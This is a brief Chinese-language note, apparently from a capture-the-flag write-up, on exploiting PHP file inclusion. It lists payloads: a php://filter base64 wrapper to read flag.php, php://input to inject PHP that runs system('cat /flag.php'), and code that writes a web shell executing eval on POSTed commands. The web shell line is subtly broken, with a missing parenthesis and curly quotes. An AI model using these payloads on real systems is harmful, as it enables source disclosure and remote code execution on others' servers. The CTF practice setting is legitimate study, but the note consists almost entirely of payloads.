------------恢复内容开始------------
构造payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
php需要转化成base64显示出来 不然会被执行
或者是php://input
直接传入php代码
<?php system('cat /flag.php');?>
或者传大马生成shell
<?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>